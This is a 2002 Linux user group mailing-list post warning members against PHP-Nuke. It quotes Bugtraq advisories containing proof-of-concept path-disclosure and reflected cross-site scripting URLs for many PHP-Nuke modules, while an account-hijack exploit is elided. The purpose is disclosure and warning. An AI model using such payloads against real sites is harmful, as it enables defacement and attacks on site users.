[KLUG Members] RE: great site to "get together" in

Jamie McCarthy members@kalamazoolinux.org
Sat, 27 Apr 2002 00:19:01 -0400

Previous message: [KLUG Members] RE: great site to "get together" in
Next message: [KLUG Members] Meeting 2002-04-30 - Fight SPAM Now!
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

john@bridleman.org (John Bridleman) writes:

> > I would like to give a suggestion to KLUG members.  There is a
> > site to take a look at, which is: www.p-two.net and check out
> > the forum site.  It's a fairly new site that uses a system
> > like a bulletin board, and if you look there, it's pretty
> > vacant for users at the moment.  I would suggest that the KLUG
> > members
> 
> php-nuke. A /. clone.

Searching on "nuke" in my "security" email folder (which is mostly
the bugtraq mailing list) turns up 31 hits in the last six months,
14 in the last two months.  You can consider me biased because I
code a "competing" content management system (Slash), but I would
not use php-nuke on any computer I cared about.  I would assume it
would be 0wned quickly.

Here are some of the more serious examples (ignoring Post-Nuke-only
vulnerabilities).

Example from March 17:

> Hi all BugTraq readers!
> 
> I've found a bug in PHP-Nuke and Post-Nuke that allows
> one to hijack other accounts.
[exploit elided]
> Post-Nuke is vulnerable to this too.
> 
> Vendor Status
> I contacted Francisco Burzi over 2 weeks ago and he did not
> reply. I delayed the relase because I found out that Post-Nuke
> has this bug too. I contacted authors of Post-Nuke and they
> replyed almost immediatly and a fixed version is now available.

Example from April 3:

> Hello, 
> 
> I found 2 security bugs in phpnuke
> 
> The first is a path disclosure vulnerability : 
> Change this 
> http://nukesite.xxx/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=3
> in that ...
> http://nukesite.xxx/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink
> 
> The second one is hax0r style :
> change this ...
> http://nukesite.xxx/modules.php?op=modload&name=Web_Links&file=index&l_op=ratelink&lid=17&ttitle=Great_places_for_free_advertising!
> to this...
> http://nukesite.xxx/modules.php?op=modload&name=Web_Links&file=index&l_op=ratelink&lid=17&ttitle=<h1>You%20HaVe%20BeEn%20HaX0red!!!

Example from April 23:

> Cross site scripting is a serious problem, (even if some people
> doesn't believe it), On this second round i'll show 8 new XSS
> vulnerabilities in PHP Nuke (most of them are also path
> disclosure vulns):
> 
> http://nuke/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=%22%3Ch1%3EI%20Love%20XSS%3C/h1%3E
> http://nuke/modules.php?name=Classifieds&op=ViewAds&id_catg=%22%3Ch1%3ESmelly%20socks%20category%3C/h1%3E&id_subcatg=75
> http://nuke/modules.php?op=modload&name=Guestbook&file=index&entry=%22%3Ch1%3Etest%3C/h1%3E
> http://nuke/modules.php?name=Your_Account&op=userinfo&uname=%22%3Ch1%3Etest%20123%3C/h1%3E
> http://nuke/modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=Replugge%20Love%20PHPNuke%20
> http://nuke/modules.php?name=Stories_Archive&sa=show_month&year=Love%20this&month=3&month_l=Replugge
> http://nuke/modules.php?name=Surveys&pollID=%22%3Ch1%3Etest%3C/h1%3E
> http://nuke/modules.php?op=modload&name=WebChat&file=index&roomid=%22%3Ch1%3EBugger%20You%3C/h1%3E
> 
> 
> That in Addition to the 9 i mentioned last week on my posting to
> vuln-dev:
> 
> http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=%22%3E
> http://nuke/modules.php?name=Downloads&d_op=viewdownload
> http://nuke/modules.php?name=Downloads&d_op=viewdownload&%22%3E
> http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=
> http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=anything_here
> http://nuke/modules.php?name=Downloads&d_op=brokendownload&lid=%22%3Ch1%3EFREE%20Downloads%20with%20virus%20included!!!%3C/h1%3E
> http://nuke/modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=%22%3Ch1%3E%3Cb%3EHax0r!%3C/b%3E%3C/h1%3E
> http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1%3ECooooooooooooool!!!!%3C/h1%3E
> http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=49&ttitle=%22%3Ch1%3EIll%20advertise%20my%20dirty%20underwear%20in%20here%3C/h6%3E
> http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1%3E%3Cb%3Eboth%20of%20them?%3C/b%3E%3C/h1%3E&ttitle=%22%3Ch1%3E%3Cb%3Ewhy%20not%20modify%3C/b%3E%3C/h1%3E
> 
> 
> I would like to mention that i couldn't find any contact
> information on phpnuke's website (without registering as a user).

--
 Jamie McCarthy
 jamie@mccarthy.vg

Previous message: [KLUG Members] RE: great site to "get together" in
Next message: [KLUG Members] Meeting 2002-04-30 - Fight SPAM Now!
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]